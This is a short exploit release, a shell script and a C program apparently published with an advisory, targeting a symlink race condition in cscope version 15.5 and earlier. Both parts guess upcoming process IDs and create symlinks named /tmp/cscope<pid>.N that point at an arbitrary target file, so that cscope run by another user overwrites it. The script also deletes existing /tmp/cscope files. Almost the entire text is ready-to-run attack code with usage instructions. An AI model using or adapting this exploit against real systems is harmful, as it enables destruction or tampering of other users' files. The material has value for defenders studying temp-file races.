#!/bin/sh
#################################################################
# RXcscope_proof.sh
# brute force case baby
# cscope advisory and exploit by Gangstuck / Psirac <research@rexotec.com>
#################################################################

HOWM=30
CURR=`ps | grep ps | awk '{print $1}'`
NEXT=`expr $CURR + 5 + $HOWM \* 2 + 1`
LAST=`expr $NEXT + $HOWM`

echo -e "\n--= Cscope Symlink Vulnerability Exploitation =--\n"\
" [versions 15.5 and minor]\n"\
" Gangstuck / Psirac\n"\
" <research@rexotec.com>\n\n"

if [ $# -lt 1 ]; then
echo "Usage: $0 <file1> [number_of_guesses]"
exit 1
fi

rm -f /tmp/cscope*

echo "Probed next process id ........ [${NEXT}]"

while [ ! "$NEXT" -eq "$LAST" ]; do
ln -s $1 /tmp/cscope${NEXT}.1; NEXT=`expr $NEXT + 1`
ln -s $1 /tmp/cscope${NEXT}.2; NEXT=`expr $NEXT + 1`
done

---8<--------8<-------cut-here-------8<---------8<---

/* RXcscope exploit version 15.5 and minor */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BSIZE 64

int
main(int ac, char *av[]) {
pid_t cur;
u_int i=0, lst;
char buffer[BSIZE + 1];

fprintf(stdout, "\n --[ Cscope Exploit ]--\n"\
" version 15.5 and minor \n" \
" Gangstuck / Psirac\n" \
" <research@rexotec.com>\n\n");

if (ac != 3) {
fprintf(stderr, "Usage: %s <target> <max file creation>\n", av[0]);
return 1;
}

cur=getpid();
lst=cur+atoi(av[2]);

fprintf(stdout, " -> Current process id is ..... [%5d]\n" \
" -> Last process id is ........ [%5d]\n", cur, lst);

while (++cur != lst) {
snprintf(buffer, BSIZE, "%s/cscope%d.%d", P_tmpdir, cur, (i==2) ? --i : ++i);
symlink(av[1], buffer);
}